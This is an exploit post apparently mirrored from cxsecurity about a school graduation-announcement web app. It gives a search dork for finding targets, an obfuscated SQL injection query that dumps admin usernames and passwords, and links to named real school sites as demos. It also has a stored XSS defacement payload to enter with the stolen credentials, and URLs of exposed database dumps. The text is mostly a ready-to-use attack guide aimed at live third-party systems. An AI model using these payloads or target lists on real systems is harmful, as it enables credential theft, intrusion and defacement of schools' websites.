2020-10-05 23:43:07 Author: cxsecurity.com(查看原文) 阅读量:139 收藏
Aplikasi Pengumuman Kelulusan – SQL-I, XSS, and Database Information Disclosure Vulnerability
#Exploit Title: Aplikasi Pengumuman Kelulusan – SQL-I, XSS, and Database Information Disclosure Vulnerability #Date: 2020-09-09 #Exploit Author: Gh05t666nero #Vendor Homepage: https://github.com/slametbsan #Google Dork: intitle:Pengumuman.Kelulusan site:sch.id intext:Masukkan #Category: webapps #Tested On: Linux #1 SMP Debian 5.7.6-1kali2 (2020-07-01) #Software Link: https://github.com/slametbsan/kelulusan/archive/kelulusan.zip ############################################# [*] SQL Injection #Query: Gh05t666nero' or'1'=1 And/**/.0union/*%26*/distinctROW select (SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(un_user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),2,3,4,5,6,(select group_concat(column_name,0x3c62723e,table_name) from information_schema.columns where table_schema=database()),8# #Demo: Demo 1: http://pengumuman.smkn1nabire.sch.id Demo 2: http://smkn2bulik.sch.id/kelulusan Demo 3: http://smkn2sampang.sch.id/kelulusan/19 #Proof of Concept: Do a search using the dork provided above, then do the vulnerability exploitation using the Query that I have listed above. Copy the Query and paste it in the form section in the middle of the page then submit the Query code, it will automatically dump the username|password that is in the site's database. #Login Page: For the login page section, just add the path /admin ############################################# [*] Cross Site Scripting [STORED] #Payload: <br><h1 style="color:green; text-align:center;">Poisoned by Gh05t666nero</h1> #Proof of concept: Enter the admin dashboard using the credentials from the SQL vulnerability exploitation that I described above then enter the Konfigurasi menu. Before entering the XSS Payload, click the Edit button first. After that, please enter the XSS Payload on the Nama Sekolah form then click the save button, the Payload will be executed and stored. ############################################# [*] Database Information Disclosure #Example Bug: http://www.mikrotik.smkn3garut.sch.id/un2016.sql http://smkn2bulik.sch.id/kelulusan/un2016.sql http://kelulusan.smkn1jati.sch.id/un2016.sql ############################################# Contact Me:- [email protected] Instagram:- @ojan_xploit Telegram:- @Gh05t666nero1
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh